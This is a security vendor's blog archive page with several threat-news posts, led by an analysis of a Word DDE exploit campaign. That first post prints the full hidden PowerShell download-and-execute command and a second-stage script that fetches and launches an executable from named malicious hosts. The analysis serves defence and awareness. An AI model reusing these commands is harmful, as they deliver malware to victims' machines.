Tag Archives: featured1

A New Attack Takes Advantage of an Exploit in Word

On October 10th, researchers at the Chinese firm Qihoo 360 published an article warning of a zero-day exploit (CVE-2017-11826) affecting Office and which was already actively being exploited by attackers.

In the last few hours, we have detected a spam campaign targeting companies and making use of this exploit. This is a very dangerous attack since commands can be executed in Word with no OLE objects or macros needed. All our clients are proactively protected and updating will not be necessary thanks to Adaptive Defense 360.


The email comes with an attached document. When opening the Word document, the first thing we see is the following message:

If we click “Yes”, the following message appears:

Next, the following message appears:

The document (sample 0910541C2AC975A49A28D7A939E48CD3) contains two pages. The first is blank, the second contains just a short message in Russian: “Error! Section unspecified.”

If we right-click the text, we can see that there is an associated field code:

If we click “Edit field”, we find the command used to exploit the vulnerability and allow the code to execute:

DDE C:\Windows\System32\cmd.exe “/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘hxxp://arkberg-design.fi/KJHDhbje71’);powershell -e $e “


Here is a screen shot of the process tree that is generated if the exploit is executed properly:

Exploit CVE-2017-11826 – Download and execution of malware from the Word document

Here are some of the files used in this campaign:

  • I_215854.doc
  • I_563435.doc
  • I_847923.doc
  • I_949842.doc
  • I_516947.doc
  • I_505075.doc
  • I_875517.doc
  • DC0005845.doc
  • DC000034.doc
  • DC000873.doc
  • I_958223.doc
  • I_224600.doc
  • I_510287.doc
  • I_959819.doc
  • I_615989.doc
  • I_839063.doc
  • I_141519.doc

Commands to be Executed

Depending on which simple is analyzed, we can see that the download URL changes, despite the command being essentially the same.

Sample 0910541C2AC975A49A28D7A939E48CD3

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://arkberg-design.fi/KJHDhbje71’)~powershell -e $e

Sample 19CD38411C58F5441969E039204C3007

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://ryanbaptistchurch.com/KJHDhbje71’)~powershell -e $e

Sample 96284109C58728ED0B7E4A1229825448

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://vithos.de/hjergf76’)~powershell -e $e

Sample 1CB9A32AF5B30AA26D6198C8B5C46168

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://alexandradickman.com/KJHDhbje71’)~powershell -e $e

The following powershell script is downloaded and executed:

$urls = “hxxp://shamanic-extracts.biz/eurgf837or”,”hxxp://centralbaptistchurchnj.org/eurgf837or”,””,”hxxp://conxibit.com/eurgf837or”

foreach($url in $urls){



Write-Host $url

$fp = “$env:temprekakva32.exe”

Write-Host $fp

$wc = New-Object System.Net.WebClient

$wc.DownloadFile($url, $fp)

Start-Process $fp





Write-Host $_.Exception.Message



From this URL:


And a Trojan is downloaded (4F03E360BE488A3811D40C113292BC01).

MD5s from the Word document:


The post A New Attack Takes Advantage of an Exploit in Word appeared first on Panda Security Mediacenter.

Read More

KRACK attack: beware of public Wi-Fi

Why can KRACK be so dangerous?

Cybersecurity experts have discovered a critical weakness in Wi-Fi connections that could make your private information vulnerable to cyber criminals. The threat is called KRACK (key reinstallation attacks) and could allow someone to steal information sent over your private Wi-Fi or any open connections you might access in public places like coffee shops.

KRACK is dangerous because it affects so many people. Most people who connect wirelessly to the internet through Wi-Fi on their phone, tablet, laptop, etc. do so using the WPA2 (Wi-Fi Protected Access) protocol that helps keep your information safe by encrypting it—making it a secret code. Only now, KRACK has made it much less protected because thieves may be able to decypher the code that protects your information, and read it whenever they want.

Cyber criminals can also use KRACK to modify wirelessly transmitted data to and from the websites you visit. You might think you’re going to your bank’s website, when in reality you’re at a fake phishing site made to look like it. You unknowingly enter your username and password, and the thieves now can record that information.

How do I protect myself?

Update your operating system

Update your OS ASAP. In the meantime, Apple, Google and others are presumably working to roll out a patch to protect against KRACK.

Microsoft just announced it included a patch in an October 10th security update. For Windows customers who have their “Windows Update enabled and applied the security updates,” they’re automatically protected from the KRACK threat, according to Windows Central.

However, don’t assume you’re protected. Even if you’re a Windows user, double check you have the latest security updates.

Use Wi-Fi networks only when necessary

Until you’ve installed the security KRACK patch, avoid using Wi-Fi connections, both at home and especially public hotspots. Your home Wi-Fi connection is slightly more secure only because cyber thieves need to be relatively close to your physical location to steal your data. But that doesn’t mean you’re safe at home or in public.

If you absolutely need to use a wireless network, make sure you’re not transmitting confidential info like your SSN, credit card number, or bank information.

If possible, hardwire your wirelessly connected devices back to your modem/router. Cyber criminals can’t steal signals out of the air if they’re not there, so find that yellow ethernet cable you stashed somewhere in a drawer and use it to connect to as many devices as possible.

Update your wireless router’s firmware

Your router’s firmware helps it work correctly with your devices, so keep it up-to-date. When the security patch rolls out, you don’t want any issues with conflicting or unsupported firmware versions. Updating your router’s firmware is a relatively painless process.

Configure your router so only your approved devices can connect to the network. Each of your devices has a media access control (MAC) address that uniquely identifies it to work with the network. Configure your router to only allow listed devices. The process may differ depending on your router brand.

Hide your Wi-Fi network so even those close enough to detect your signal won’t see it listed. Hiding your network won’t stop dedicated hackers from eventually finding it, but it will create another step they must go through, which is your goal until the patch comes through. It’s likely it will take developers some time to adequately address KRACK, so stay vigilant.

Avoid unencrypted websites

Encrypted websites contain an HTTPS at the beginning of their URL’s. The information you send and receive to them is secure. Websites that only use the HTTP are NOT encrypted. So use HTTPS sites as much as possible. HTTPS Everywhere is a browser plugin that automatically switches thousands of sites from HTTP to HTTPS.

Get some good cybersecurity software

Having cybersecurity software always helps mitigate risk. For critical attacks like KRACK, it’s especially important to add as many layers of protection as possible.

What information can be stolen?

Anything you can send wirelessly over the internet. So, pretty much everything. Passwords, credit card numbers, voice messages, pictures, texts, and the like. Again, this goes for both public and private wireless networks, so your info could be stolen while you’re signed in to the library’s Wi-Fi network or when you’re texting someone from your living room. Deactivate your cell phone’s Wi-Fi connection until you’ve gotten the fix from your OS developer or stay on 3G network for data transfer.

Can it affect my devices?

Strictly speaking, no. Neither your wirelessly connected devices nor your router are being directly targeted. Unlike ransomware, thieves aren’t KRACKing into your device and threatening to destroy your information. It’s more of an elaborate heist job than a hostage situation. They want to decrypt the protocol, to eavesdrop on what your devices are saying. They’re interested in the info not who is talking. More importantly, thieves want to go unnoticed.

How did the KRACK vulnerability happen?

Your cell phone and Wi-Fi device (i.e. modem) need to “talk” to each other decide on how to work together transmit data. The language they use is called a protocol, or system of rules. The protocol is encrypted for privacy. It’s like if two people switched to a different language to discuss something privately. If you don’t know the language, you’re in the dark. That’s how your information is kept private when sent over Wi-Fi.

But the KRACK attack gives cyber criminals an opening to decrypt the information sent. It would be like someone bringing an interpreter to the couple’s private discussion. They now can overhear everything that’s being said.

Can I tell if someone’s stealing my info over Wi-Fi?

As of yet, there’s no way to know if someone is KRACKing your wireless access. That’s why it’s especially important to keep an eye out for an update, and to follow the safety recommendations above.



The post KRACK attack: beware of public Wi-Fi appeared first on Panda Security Mediacenter.

Read More

Is Fileless Malware an Undetectable Threat?

Unlike the malware that we’re “used to”, fileless malware is able to infect and cause damage without leaving a trace. Its secret, as its name indicates, is not to record any type of file on the hard disk. All action takes place “in the air”, that is, on memory. The moment the system restarts the virus will disappear, but the damage will already be done. Can you fight an enemy that leaves no trace? Of course the answer is yes.

What is Fileless Malware?

Fileless malware is a type of Advanced Volatile Threat or AVT, malicious code that is designed to not write itself onto the hard drive and work from the RAM. In general, viruses and other types of malware need one or more files to act on the system. They are usually detected immediately by defense systems in operation and subsequently identified and quarantined. However, fileless malware does not need such files on the hard drive, so traditional protection systems are in fact completely unable to detect it. Naturally, it is much more difficult to defend against attacks using this technique, as these infections are not only difficult to detect, but also much more resilient and difficult to control.

They are also ephemeral malicious processes, since they disappear the moment the system is reset. Depending on the variants, we can find malware such as Phasebot, a fileless malware sold on the black market as a kit to make a virus specialized in data theft. Or Anthrax, a hybrid virus. Its modus operandi is to go into “fileless mode” once the infected executable has been opened. Once restarted, the virus passes by way of memory and infects new files. Poweliks forces the system to generate fraudulent visits and opens the door to new possibilities of infection through command and control servers (C&C).

The symptoms and damages caused by this fileless malware are very diverse. In any case, it is a serious problem for forensic system analysis, as well as protection strategies based on white lists, signature detection, hardware verification, or pattern recognition … In short, it gives all the tried-and-true methods of malware detection a run for its money.

Protecting Yourself Against Fileless Malware Is Possible

Fileless malware is a concept with a decades-long history behind it. However, its evolution has skyrocketed in recent times, seeing a record of viruses with incredibly harmful potential and overwhelming effectiveness. How can we defend against the threat of a code that leaves no traces on the hard drive? The secret is in behavior. Monitoring the system for malicious behavior is probably the most effective method. Panda Adaptive Defense 360 ​​is able to classify 100% of the active processes in the corporate network and detect any compromising activity, in real time, alerting users of any and all suspicious behavior as soon as it occurs.

In 220 efficacy tests performed with Adaptive Defense 360, 99.4% of the infection attempts were detected. In none of the cases was there a false positive, nor any lost data, including potential fileless viruses in the tests. According to data obtained in the last PandaLabs security report, among our corporate clients 2.67% of the machines protected by traditional solutions suffered attacks by unknown threats, a higher figure when compared to 1.27% of the machines protected with Adaptive Defense, which blocks attacks instantly and without any collateral damage.

A proactive strategy is, as always, the best strategy. The conventional wisdom certainly applies here: always keep your systems updated, monitor suspicious traffic, restricting the use of macros etc. Other less-known countermeasures include restricting scripting languages and disabling, if possible, Windows PowerShell, one of the main routes exploited by fileless malware. In the end, only dedication and healthy security practices, coupled with the right tools, will keep us safe from the malware that we cannot see.

The post Is Fileless Malware an Undetectable Threat? appeared first on Panda Security Mediacenter.

Read More

Don’t Let Yourself Become the Next Equifax

Last month we wrote about the biggest hack of sensitive personal data in history. Equifax, the financial entity that manages data for more than 820 million consumers and more than 91 million businesses around the world, suffered a global attack by an organized group called the PastHole Hacking Team, affecting customer data not only from the United States, but also Canada and the United Kingdom.

Following the recent events, it has come to light that the massive hacking attack is not the only grievance that the company has suffered. As it turns out, there was also malware on the company’s website.

Ars Technica reports that a security analyst named Randy Abrams came to the site to check his credit information when he encountered a fake Adobe Flash installer, one of those pop-ups that abound on the internet and demand that you “click here”, only to redirect you to some malicious site full of internet junk.

The subsequent analysis revealed that the “promoted” malicious software is called Adware.Eorezo and is marked as malware by only three cybersecurity solutions in the world, including Panda Security, testament to the great effort that went into hiding the code so as to cause as much damage as possible.

Panda’s good performance against Adware.Eorezo coincides with the AV-Comparatives Business Security Report recognizing the Adaptive Defense 360 ​​smart cybersecurity solution. This platform would successfully prevent an organization from becoming the victim of an attack such as Equifax. In the words of the independent laboratory, “Panda Adaptive Defense 360 ​​is managed by a well-designed, clearly laid-out cloud-based console, which would be very straightforward for less-experienced administrators to use. This makes it particularly suitable for small businesses, while its EDR features will make it appealing to corporations. ”

Now, the question is, how did attackers manage to slip past the security barriers at Equifax, a site with troves of incredibly sensitive data? Things may have turned out differently with the right security solution. Only unlimited visibility and total real-time control of advanced threats can be effective in protecting the IT infrastructure.

The post Don’t Let Yourself Become the Next Equifax appeared first on Panda Security Mediacenter.

Read More

Perry Carpenter: “Don’t be Afraid of Simulated Attacks”

Perry Carpenter is Chief Evangelist and Strategy Officer at KnowBe4, one of the most popular platforms for phishing simulations and building cybersecurity awareness. Perry was previously Research Director for Security & Risk Management at Gartner, and is an expert on what can be called the “human side” of cybersecurity. We spoke with Perry about good password hygiene, conditioning ourselves to create good security habits, and the benefits of continual employee training with simulated attacks.

 What is your overall vision of the state of enterprise cybersecurity in 2017?

The thing that’s been most encouraging this year when it comes to cybersecurity is seeing some of the teamwork that has happened across the globe. So the threats, I think, will always increase — we’re always going to see new attack vectors, we’re going to see new financially motivated crimes, we’re going to see larger and larger data breaches, like the Equifax breach. I think we’re going to continue to see that, but what’s been encouraging for me is, in the wake of issues like WannaCry and NotPetya, or the GoogleDocs phishing event, we’ve seen a very strong international community of people coming together and sharing real-time research and progress on working through these problems. This seems very new to this year, whereas in past years we’ve seen people hold some of that information close and not share it, because they perhaps wanted to monetize it by building the patches, or selling the fixes to one of the major security vendors, and letting that vendor have an exclusive way for mediating the problem. But we’ve seen a lot of open-source, intelligent sharing between security researchers this year. It’s been great.

Do you believe employees are the weakest link in enterprise cybersecurity?

I believe that users in general can be the weakest link. The thing with users is that we’re all human, and we’re all vulnerable based on the way that our brains are wired. Attackers find ways to manipulate us and get us to perform actions that maybe we believe we’re not susceptible to performing, like clicking on a link or downloading an attachment, or violating a policy. And some of that happens in spite of a person’s better judgement. So we can be the weak links, and it’s because of behavior patterns and neurological factors in how we’re wired. The good news behind that, though, is that, like anything that we learn, and have that learning ingrained in us, good patterns can become habit. That’s the good news for us.

Perry Carpenter

So while a user can be the weak link, we have to realize that they are the last line of defense in many organizations. But if we properly use some behavioral conditioning and some other psychological factors around how we train users, then we can channel them into the right behavior so that they can actually become a very strong part of our layered defense model. After a firewall hasn’t prevented something, or a secure email gateway hasn’t prevented something, or an Endpoint Detection and Response vendor hasn’t protected something, there is that last line of defense that is the human. And we would hope that some of the innate pattern matching abilities that humans have can be strengthened, and some of the muscle memory, and psychological habits that people can get in, can become very strong habits over time.

Do you have any employee protocol that you teach or follow to actually improve how they react to potential threats?

We do, specifically in the social engineering context. We are firm believers, and we are innovators in the market, of automated social engineering testing. And the way that works is, you can configure in the system the types of phishing emails, or voicemail phish, or even multi-pronged phish that span email and text messaging and invoice, all to try to drive somebody to take an unsecure action. By presenting those simulated situations to end users, hopefully without warning, and giving them the opportunity to see those, and giving them the training on how to detect the red flags — when you frequently expose people to that, and you tell them the best practices, and allow them to fail safely the first few times, they’re able to build the more secure reflexes that we would hope that end users have.

The key, for me, is doing that type of testing frequently. And where I see a lot of companies fail is that they will do a simulated social engineering test once a year, or once every three months, and that’s not going to train people. That’s just going to show you how bad the problem is. If you actually want to train people, then it’s like anything else in life. It’s like physical fitness, or a habit that you’re trying to create. You have to engage in that in a very deliberate routine pattern, and in frequent intervals. If you’re testing quarterly, then you’re taking a quarterly baseline. If you’re training every two weeks or every month, then you’re actually starting to develop some muscle memory. If we do that, then we’ll see the behavior improve, we’ll see what we call the person’s “phish-prone percentage” go down. Ultimately the attack surface has been lessened, because the habits are what you want them to be. The only way is to have continual testing, so that they’re continually training that muscle and not letting it atrophy.

How do you overcome cybersecurity fatigue? Even simple security steps, like using strong passwords for example, can frustrate employees. How do you communicate to them the importance of cybersecurity?

There is a behavioral researcher out of Stanford University in the US, BJ Fogg, and I love the way he phrases the behavior problem when it comes to people making healthy choices — and security is pretty much the same way. He says there are three fundamental things about humans. Number one is we’re lazy. Number two is we’re social. And number three is that we’re creatures of habit.

In your example, when it comes to creating a good password, you hit exactly on those three things that he mentions. One, we’re lazy: we want to choose the easy password. Two, we’re social: we’re going to have the same habits as the people around us, so if we’re in a group of people and we’re all complaining, then going with the group mindset is the easiest thing to do. And three, we’re creatures of habit: that definitely plays into password mentality. We’ll choose a password, and then whenever it comes time to create a new password, we’ll just put a number on the end of it. We’ll change it from “monkey1” to “monkey2”, and then “monkey3” and so on. So with passwords we see all three of those principles, and the way to effect change isn’t necessarily just to keep saying security is important. We need to reinforce the “why” behind the policy. The critical thing that we have to do is to facilitate the change we want. So that means pushing them in the right direction in friendly ways, ways that they won’t want to rebel against. You can show them that creating a new password is easy, by even looking at the new NIST password recommendations, where they’re talking about moving to passphrases that are easy to remember, rather than these huge complex passwords that nobody could ever grasp.

What are the key takeaways that an employee should get from cybersecurity training?

I’ll boil it down to the most important one, which is: think before you act. The reason why is because if we just go with our default reflex, that could be wrong. Somebody could be playing us based on emotion or urgency, and we might just react. But if we could slow down for a second and think logically, then we might have the result that the organization wants from a security perspective.

Number two would be to create and remember good passwords, and have good password hygiene. And the reason behind that is that it is one of the things that we can fix now. Even though the password management market has a bad rap, it is better than the system that we use mentally. So a product like LastPass or Dashlane or KeePass can help people have this vault for the 50-60 passwords that they have to remember.

Three would be to care as much about your customer’s data as you care about your personal data.

What advice would you give to a company that wishes to stay safe in the new cyber ecosystem, from both the technological and human side of security?

I would say that safety is relative. We live in the age of having to come to grips with the fact that everybody is compromised, every system is compromised, so when it comes to safety, the key is trying to determine how we handle compromise when we hear of it and what mitigating factors we put in place post-compromise so that the same thing doesn’t happen again. For organizations that are wanting to work on the human behavior side, my best advice is to not be afraid of simulated attacks. That’s the only way to know how your people are going to behave when the real thing comes, and it’s the only way to condition them to have the right behavior. When it comes to safety, we have to take the blinders off, know the situation that we’re in, and act accordingly.

Parts of this interview were lightly edited for clarity.

The post Perry Carpenter: “Don’t be Afraid of Simulated Attacks” appeared first on Panda Security Mediacenter.

Read More

Hackers demand nude images instead of money

We thought that we’d seen everything but hackers managed to hit a new low. Last month the news about a new ransomware that demands nude photos instead of the usual cryptocurrency started circulating the online world. The new ransomware is called nRansomware and works very similar to Locky – it is a malicious software that infects your device and locks some of the files on your system. Luckily the new threat is not a state of the art malicious software. While Locky encrypts your data, nRansomeware is known only to lock your screen. It is unfortunate enough but not absolutely devastating.

Up until now, when a PC was infected with ransomware, the cybercriminals behind it were after immediate monetary gain. However, hacker’s shady techniques are continually evolving. Online troublemakers are starting to realize that Bitcoin and most of the virtual cryptocurrencies are not as secure and untraceable as they initially thought. Payments can easily be tracked, so they decided to get creative by releasing ransomware that demands ten nude photos from the victims to “unlock” their computer.

The new ransomware feels like a yet another episode of the modern-day nightmares described in the hit TV series Black Mirror. When infected, your computer displays the text below instead of your desktop. The ruthless message from the hackers is placed on a background containing offensive language and multiple images of Thomas the Tank Engine.

Your computer has been locked. You can only unlock it with the special unlock code. Go to protonmail.com and create an account. Send an email to 1_****_yourself_1@protonmail.com. We will respond immediately. After we reply, you must send at least ten nude pictures of you. After that, we will have the verify that the nudes belong to you. Once you are verified, we will give you your unlock code and sell your nudes on the deep web.

It does sound gross, doesn’t it? The last thing you want is perverts bidding over imagery of your naked body. Hackers have been stealing intimate images from celebrities for a long time. Sadly, now they are starting to realize that they can make a buck by extorting regular people too. You no longer have to be rich or famous to attract hackers’ attention.

Is it a prank or a sign of the new way hackers will be making money out of the innocent? The time will show. One is for sure, cryptocurrencies are not untraceable, and cyber bullies with twisted minds exist out there. They are not afraid to pray on the weak by continuously finding new ways to avoid being caught. The chances of becoming a victim of such ransomware are rare to impossible if you are protected and follow our tips for staying out of trouble.

The post Hackers demand nude images instead of money appeared first on Panda Security Mediacenter.

Read More

Cryptocurrency Mining Takes its Toll on AWS Servers

Bitcoin has skyrocketed over the last several years and has become the most coveted currency of today. Not belonging to any state or country, able to be used all over the world equally and immediately, and able to provide complete anonymity when doing business — these are some of its biggest draws. But like any other payment system, using Bitcoin carries with it a few processing fees. Specifically, it uses a great deal of energy used for mining, and requires high-powered hardware. This reality places companies, and their infrastructures, in the crosshairs of cybercriminals looking to make a profit with mining software, without the overhead costs of running servers themselves.

 A few days ago, hackers attacked thousands of computers around the world through an attack of ransomware, posing as the Amazon team. Now, they’ve turned their attention to the power of the cloud.  Companies that hire Amazon Web Services (AWS) and do not adequately protect their servers are especially at risk.

Amazon and the Cryptocurrency Business

Despite the many security services that companies can hire for their systems, studies reveal that 97% of the 1,000 largest companies in the world are affected by data breaches and ransomware. Today, thanks to the rise of cryptocurrency, there is a more profitable activity offered by hijacked corporate servers: mining Bitcoins.

The value of this virtual currency has already reached record highs, attracting more and more cybercriminals interested in making easy money. In recent months, threat reports analyzed by PandaLabs show a marked increase in malware installed via the Remote Desktop Protocol (RDP). We witness thousands of ransomware infection attempts every day, as well as attempts to hijack servers for bitcoin mining. These attempts have one thing in common: the access route being the RDP after obtaining credentials through a brute force attack. It’s the same story all over again, just with different characters. We’ve seen it with ransomware and RDP attacks, and now we’re seeing it with bitcoin mining in the business world.

When we think of cryptocurrency, we usually associate it with bitcoin, but there are plenty of others. Hundreds, in fact. Cybercriminals install miners for a whole array of coins, as we saw in a case we wrote about which involved mining software for Monero and took place before the WannaCry attacks.

This time, according to a report by RedLock Cloud Security Intelligence (CSI), Amazon Web Services servers were compromised by cybercriminals who were able to access the system. However, in an unusual development, hackers did not seek to steal data or block the servers, but rather sought to access the system’s power for bitcoin mining. According to the information disclosed by RedLock, Amazon was not the only company attacked, as Aviva and Gemalto, two multinationals, were also mentioned in the report as victims.

What to Do to Protect Your Server

This latest hack shows the importance of creating robust corporate passwords. They don’t even need to be hard to remember. And of course, do not pass up advanced cybersecurity solutions that monitor the organization’s systems in real time, detecting and stopping any suspicious behavior that could be harmful.

The post Cryptocurrency Mining Takes its Toll on AWS Servers appeared first on Panda Security Mediacenter.

Read More

Dridex, the Latest Version of the Credential Theft Malware

At the beginning of the year we talked about a new evolution of cyber theft in the banking sector, and today, we are pleased to share a report that has been painstakingly prepared by the malware laboratory at Panda Security on the latest version of Dridex, a famous banking Trojan known for its sophistication and ability to go undetected on infected computers.

What is Dridex?

The present document gathers analysis of a new variant of harmful code called “Dridex”, specifically the fourth version.

Dridex is a banking Trojan famous for its sophistication and its ability to go undetected on the devices it infects. These devices, once infected, are incorporated onto a modular botnet, at which point malicious characteristics, whether external or their own, can be freely added to them, via modules or libraries (sold separately).


The first version appeared toward the end of 2014. At the beginning of 2015, a new, important update was launched, giving way to a second version. When looking at the earlier versions of Dridex, the most stable and resistant of them was the third, which was launched in April 2015 and was used in well-known cyberattacks up until the fourth version, the latest known version and subject of this report, which was found in February of 2017.

No new major updates for Dridex had been found since the dismantlement of important components of the botnet, carried out by government agencies in 2015.

This new variant of the banking Trojan incorporates new functionalities. One of these is called AtomBombing, a functionality whose aim is to inject code without calling suspicious APIs to avoid being detected by monitoring systems. It incorporates the DLL hijacking technique to achieve persistence. Finally, various cryptographic methods were optimized and used to obtain the configuration.

Characteristics of the Trojan

The following are some static properties of the analysed file.

The hash of the Trojan:

MD5 001fcf14529ac92a458836f7cec03896
SHA256 a6db7759c737cbf6335b6d77d43110044ec049e8d4cbf7fa9bd4087fa7e415c7


The internal date of creation of the analyzed sample is May 16, 2017. The file in question was compiled to be executed in 64 bit environments and, at the same time, simulate the legitimate dll of Microsoft.

Figure 1. File properties

Additionally, it is encrypted with a distinctive algorithm to avoid detection by antiviruses.

It has been observed that the executable has a fairly high number of sections, 11 in total, as we can see in Figure 2:

Figure 2. Static information of the analyzed binary

In the DATA section, we can observe that the entropy is at 7.799, and is a fairly large in size. It is in this section that the highly encrypted and packaged binary (which, once decrypted, becomes the real malicious code) can be found.

In the first decrypted layer, the executable stores memory in the process, then copies the code and, finally, summons it and runs it, as we see in Figure 3:

Figure 3. Jump to shellcode

The first thing the code does is to obtain the addresses of the functions that it will eventually be using. It does this with a dynamic search through the libraries downloaded by the program.

To carry out this task, it runs through the PEB_LDR_DATA structure and the LDR-MODULE structures to locate the base address of the loaded dlls. It proceeds to access the offset of the export table in order to run through all of the functions exported by the dll and find the address of the sought function in he computer’s memory.

Figure 4. Enumeration of loaded modules

The shellcode, in turn, checks to see whether there is a hook in the undocumented LdrLoadDll function, accessing its address and checking whether the first byte is the same as E9, the equivalent of a jmp assembler.

Figure 5. Hook Verification

If the previous verification was successful, it proceeds to demap the dll memory process with the name “snxhk.dll” which is an Avast and AVG library that creates hooks to monitor processes happening in the sandbox.

Figure 6. Library: snxhk.dll

Finally, the shellcode decrypts the executable found in the DATA section in the computer’s memory, copies it into the base image’s address, and then runs the new resulting executable.

Figure 7. Decrypted executable

In summary, the full process of the sample being unpacked can be seen in Figure 8, where it is detailed more schematically.

Figure 8. Complete unpacking process

Make sure to use advanced cybersecurity solutions like Adaptive Defense 360 that monitor the organization’s systems in real time, detecting and stopping any suspicious behavior that could be harmful to your business.

For more information, download the full report:

The post Dridex, the Latest Version of the Credential Theft Malware appeared first on Panda Security Mediacenter.

Read More

Debunking the Myths of the GDPR

The GDPR (General Data Protection Regulation) is a hot topic among experts in cybersecurity and privacy. For consumers, the GDPR will strengthen the protection of basic rights on the internet and give control of personal data back to the user. But what does this mean for companies?

As the date for its entry into force approaches, and having explained the most important changes the regulation will bring about, in this article we will have a look at some of the myths surrounding the GDPR.

Myth 1: “The GDPR only affects companies in the European Union”

This is far from being the truth. The GDPR rules will apply to all companies that offer goods or services to people from the EU, regardless of where their offices or servers are located. Therefore, the GDPR applies to all companies that process information from EU citizens, making this the first global data protection law. For example, if an EU citizen uses a US-based social network, makes an ecommerce transaction in Japan, or uses an Argentinian platform for vacation rentals, all those companies must comply with the GDPR.

Myth 2: “All security incidents must be reported within 72 hours”

This is one of the most widespread myths and has been accepted as a general rule, but there is some nuance to it. First, only personal data leaks need to be reported — it is not required in the case of security incidents or data breaches that do not involve personal data. This means that any breach that affects the confidentiality or integrity of personal information must be reported.

Moreover, the countdown for the 72 hour deadline does not start when the incident occurs, but rather when the company becomes aware that it has suffered a personal data breach. If for some reason it is not possible to report the breach to the authorities within this time period, the limit can be extended provided that the organization justifies the delay.

Myth 3: “All data must be encrypted in order to be in compliance with the GDPR”

This is false for several reasons. The GDPR requires that measures be implemented to provide an appropriate level of security, based on an assessment of the risk involved in any action that requires, for example, the processing or storage of personal data.

Although encryption is a recommended measure, it is not a must. Everything depends on the risks associated with not encrypting said personal data. Thus, in the case of sensitive data, such as patient medical information, the GDPR recommends encryption and other robust security measures, such as secure algorithms.

Panda Security Can Help Ease the Transition

These are just three of the myths shrouding a regulation that will mark a before and after in the protection of personal data. To help all types of companies adapt and comply with the GDPR, at Panda we have prepared the “Preparation Guide to the New European General Data Protection Regulation”. In this guide, we respond to major issues related to the GDPR: How does it affect my business? What obligations does this regulation bring about? What happens if I do not comply with these obligations?

With this whitepaper, and using tools included in our Adaptive Defense solution, Panda can help meet the requirements imposed by the new regulation. Although the law will not come into effect until 2018, it is vital to understand the implications of the GDPR and to implement a plan of action.

The post Debunking the Myths of the GDPR appeared first on Panda Security Mediacenter.

Read More

All Yahoo Accounts Compromised in the 2013 Yahoo Data Breach

Recently Oath, owner of Yahoo, and a subsidiary of Verizon revealed that the biggest known cyber data breach ever recorded in the history of humankind was larger than Yahoo initially announced. As you may remember back in 2013 Yahoo suffered a cyber-attack – approximately one billion accounts were affected. Even though that it took Yahoo more than two full years to release the information about the data breach to the public, further investigation by the current owners confirmed that the incident was on a much larger scale. A few days ago, the current owners of Yahoo distributed a notice stating that every single Yahoo account might have been compromised during this very same attack. The total amount of user accounts that Yahoo had at the time was around the three billion mark.

The news is a significant blowback for Verizon as they might have been able to negotiate a better deal when acquiring Yahoo should they knew that the cyber-attack had affected every customer, instead of the initially announced one-third of the accounts. In the notice released earlier today, Chandra McMahon, Chief Information Security Officer at Verizon said;

Verizon is committed to the highest standards of accountability and transparency, and we proactively work to ensure the safety and security of our users and networks in an evolving landscape of online threats. Our investment in Yahoo is allowing that team to continue to take significant steps to enhance their security, as well as benefit from Verizon’s experience and resources.”

The good news is that this is not a new security issue, Yahoo and Verizon claim that they have done everything possible to secure the accounts of its current users.

Yahoo is currently sending email notifications to the additional affected user accounts. The forensic experts hired by Verizon highlighted the fact that the compromised data is not known to contain passwords in clear texts, nor any banking information such as credit card numbers and bank account details. However, the investigation is still considered as an ongoing matter.

If you are worried that you may be amongst the affected ones, and you hadn’t taken any precautions when the breach was initially reported, check out our top 5 things you should do immediately.

The post All Yahoo Accounts Compromised in the 2013 Yahoo Data Breach appeared first on Panda Security Mediacenter.

Read More

Software and Security Information